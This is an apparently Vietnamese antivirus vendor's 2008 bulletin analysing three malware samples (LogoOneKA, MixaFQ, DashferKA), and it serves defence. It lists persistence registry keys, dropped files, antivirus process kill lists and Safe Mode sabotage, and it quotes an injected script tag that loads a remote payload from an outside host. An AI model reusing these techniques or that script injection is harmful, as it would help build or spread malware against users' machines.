1
 Sửa file hosts ngăn không cho người dùng truy
cập vào một vài trang web bảo mật.
 Sửa key không cho người dùng sử dụng một vài
tiện ích của windows và làm mất menu
FolderOptions.
 Tắt các process và các cửa sổ có chứa 1 trong
các xâu :
peid , task view, telanjang, bugil, cewe, naked, porn,
sex, alwil, wintask,
folder option,worm, trojan, avira, windows script,
commander, pc-media, killer, ertanto,
anti, ahnlab, nod32, hijack, sysinter, aladdin, panda,
trend, cillin,
mcaf, avast, bitdef, machine, movzx, kill, washer,
remove, wscript, diary,
untukmu, kangen, sstray, Alicia, Mariana, Dian, foto,
zlh, Anti, mspatch,
siti, virus, services.com, ctfmon, nopdb, opscan,
vptray, update, lexplorer, iexplorer,
nipsvc, njeeves, cclaw, nvcoas, aswupdsv, ashmaisv,
systray, riyani, xpshare, syslove,
tskmgr, ccapps, ash, avg, poproxy, mcv
 Tìm các địa chỉ mail trong máy, đồng thời gửi
mail có đính kèm virus tới các địa chỉ vừa tìm được.
Chuyên viên phân tích : Nguyễn Quốc Nhân

36. Bkav2009 (20/11/2008) cập nhật lần thứ 1:
LogoOneKA, MegabyA
Malware cập nhật mới nhất:
 Tên malware: W32.LogoOneKA.PE

 Thuộc họ: W32.LogoOne.PE
 Loại: PE
 Xuất xứ: Trung Quốc
 Ngày phát hiện mẫu: 19/11/2008
 Kích thước: 61Kb
 Mức độ phá hoại: Cao
Nguy cơ:
 Ăn cắp thông tin cá nhân.
 Lây file
 Làm giảm mức độ bảo mật của hệ thống.
Hiện tượng:
 Sửa registry.
 Dừng các chương trình diệt virus
 Làm chậm hệ thống.
 Mất icon của các file .exe
Cách thức lây nhiễm:
 Phát tán qua trang web, phần mềm miễn phí.
 Phát tán qua các tài nguyên chia sẻ mạng nội bộ
Cách phòng tránh:
 Không nên vào các trang web cung cấp các phần
mềm crack, hack, các trang web đen, độc hại
2
 Không nên mở file đính kèm không rõ nguồn
gốc, đặc biệt là các file có đuôi .exe .com .pif và .bat
 Không nên share full các ổ đĩa, thư mục trong
mạng nội bộ, nên đặt password truy cập nếu muốn
chia sẻ quyền sửa và tạo file.
Mô tả kỹ thuật:
 Ghi giá trị
"load" = %WinDir%\uninstall\rundl132.exe

vào key
HKLM\Software\Microsoft\Windows\CurrentVersion
\Run để chạy virus mỗi khi windows được khởi động
 Kiểm tra đã tồn tại key
[HKLM\SOFTWARE\Soft\DownloadWWW]
với giá trị "auto" = "1" làm dấu hiệu xác định xem
virus lây nhiễm chưa.
 Copy chính nó vào
%Windir%\ Logo1_.exe
%Windir%\uninstall\rundl132.exe
 Drop ra file: %WinDir%\RichDll.dll
 Ghi ngày lây nhiễm vào file C:\_desktop.ini
 Lây file bằng cách ghi code virus vào trước file
gốc.
 Lây vào toàn bộ các file exe trong ổ cứng từ C
đến Y.
 Lây qua mạng nội bộ bằng cách copy và lây vào
các file exe trong các thư mục shared
 Không lây những file đường dẫn có chứa:
• \Program Files\
• Common Files
• ComPlus Applications
• Documents and Settings
• InstallShield Installation Information
• Internet Explorer
• Messenger
• Microsoft Frontpage
• Microsoft Office
• Movie Maker
• MSN

• MSN Gaming Zone
• NetMeeting
• Outlook Express
• Recycled
• system
• System Volume Information
• system32
• windows
• Windows Media Player
• Windows NT
• WindowsUpdate
• winnt
 Kill các services và chương trình diệt virus:
• "Kingsoft AntiVirus Service"
• EGHOST.EXE
3
• IPARMOR.EXE
• KAVPFW.EXE
• MAILMON.EXE
• mcshield.exe
• RavMon.exe
• RavMonClass
• Ravmond.EXE
• regsvc.exe
Chuyên viên phân tích : Nguyễn Công Cường
Một số malware đáng chú ý cập nhật cùng ngày:
W32.ARPspoofT.Trojan, W32.FarfliKA.Rootkit,
W32.FialaKA.Worm, W32.MegabyA.Worm,
W32.VtLightIA.PE, W32.KxvoET.Worm,
W32.WinbetTT.Trojan, W32.AlureonB.Trojan,

W32.ArfuBot.Trojan, W32.CimusCD.Rootkit,
W32.MSFoxCB.Worm

37. Bkav2011 (21/11/2008) cập nhật lần thứ 1: Suchop,
MixaFQ
Malware cập nhật mới nhất:
 Tên malware: W32.MixaFQ.Worm
 Thuộc họ: W32Mixa.Worm
 Loại: Worm
 Xuất xứ: Việt Nam
 Ngày phát hiện mẫu: 20/11/2008
 Kích thước: 3608Kb
 Mức độ phá hoại: Trung bình
Nguy cơ:
 Làm giảm mức độ an ninh của hệ thống.
Hiện tượng:
 Sửa registry.
 Bị logoff máy tính khi sử dụng 1 vài tiện ích của
windows như: TaskMgr, RegistryTool,
 Không hiển thị được file ẩn và file hệ thống.
Cách thức lây nhiễm:
 Phát tán qua trang web.
 Tự động lây nhiễm vào USB.
Cách phòng tránh:
 Không nên vào các trang web cung cấp các phần
mềm crack, hack, các trang web đen, độc hại
 Không nên mở ổ USB bằng cách nháy kép vào
biểu tượng ổ đĩa.
Mô tả kỹ thuật:
 Ghi giá trị

"Userinit " = %SysDir%\systemio.exe
vào key HKLM\ \CurrentVersion\Winlogon\
và Virus=%WinDir%\Mixa.exe
Vào key HKLM\ \CurrentVersion\Run để virus được
kích hoạt mỗi khi Windows khởi động
4
 Copy bản thân thành các file :
%SysDir%\systemio.exe
%WinDir%\Mixa.exe
 Liên tục check các process, nếu thấy process có
chứa 1 trong các xâu : taskmgr, procexp, regedit,
mmc thì đóng tất cả các ứng dụng và LogOff máy
tính.
 Copy bản thân thành file có tên "Mixa_I.exe"
kèm theo file autorun.inf vào tất cả các ổ đĩa.
 Liên tục ghi key làm người dùng không hiện
được các file ẩn và file hệ thống.
Chuyên viên phân tích : Nguyễn Công Cường
Một số malware đáng chú ý cập nhật cùng ngày:
W32.ConthinA.Worm, W32.FialaKC.Worm,
W32.HtmInfectB.Trojan, W32.Suchop.PE,
W32.JvsoftLJ.Worm, W32.JvsoftLK.Worm,
W32.OngameFS.Trojan, W32.RsnetJZ.Trojan,
W32.Lin32.Trojan, W32.Sobicyt.Adware,
W32.Soxpeca.Adware,

38. Bkav2013 - Phát hành lần thứ 1 ngày 22/11/2008,
cập nhật DashferKA, VtLightKA, CkvoHGV,
ResycleB, Cmhot
Malware cập nhật mới nhất:

 Tên malware: W32. DashferKA.PE
 Thuộc họ: W32.Dashfer.PE
 Loại: PE
 Xuất xứ: Trung Quốc
 Ngày phát hiện mẫu: 21/11/2008
 Kích thước: 165Kb
 Mức độ phá hoại: Cao
Nguy cơ:
 Làm giảm mức độ an ninh của hệ thống.
Hiện tượng:
 Sửa registry.
 Không vào được chế độ safe mode của Windows.
 Xuất hiện popup các trang web tiếng Trung Quốc.
 Mất checkbox để hiển thị các file hệ thống.
Cách thức lây nhiễm:
 Phát tán qua trang web.
 Tự động lây nhiễm qua USB.
 Lây qua các file thực thi.
Cách phòng tránh:
 Không nên vào các trang web cung cấp các phần
mềm crack, hack, các trang web đen, độc hại
 Không nên mở ổ USB bằng cách nháy kép vào
biểu tượng ổ đĩa.
Mô tả kỹ thuật:
 Xóa các key :
HKLM\ \Control\SafeBoot\Minimal\{4D36E967-
5
E325-11CE-BFC1-08002BE10318}
HKLM\ \Control\SafeBoot\Network\{4D36E967-
E325-11CE-BFC1-08002BE10318}

làm cho máy tính không khởi động được trong chế độ
safemode.
HKLM\Software\Microsoft\Windows\CurrentVersion
\Run
 Copy bản thân thành file có tên "lsass.exe" vào
thư mục %SysDir%\Com, và ~.exe vào thư mục
Startup
để virus được thực thi khi khởi đông hệ thống.
 Tạo Mutex: CNJBlaipbofF để chỉ 1 file virus
chạy trên 1 máy.
 Dump ra các file :
%SysDir%\Com\smss.exe
%SysDir%\Com\netcfg.dll
%SysDir%\Com\netcfg.000
%SysDir%\Drivers\Alg.exe
 Sửa key làm mất checkbox để hiển thị các file
hệ thống.
 Copy bản thân thành file có tên : "pagefile.pif"
kèm theo file autorun.inf vào tất cả các ổ đĩa.
 Tắt các process có chứa một trong các xâu sau :
rav, avp, twister, kv, watch, kissvc, scan, guard.
 Thêm vào cuối các file có đuôi: jsp, php, spx,
asp, tml, htm tìm thấy trên máy trừ ổ đĩa hệ thống (kể
cả trong các file nén .rar) đoạn script :
<script
src="http://js.k01[removed].com/01.asp"></script>
 Lây nhiễm vào các file thực thi tìm được trong
máy trừ ổ đĩa hệ thống.
Chuyên viên phân tích : Nguyễn Ngọc Dũng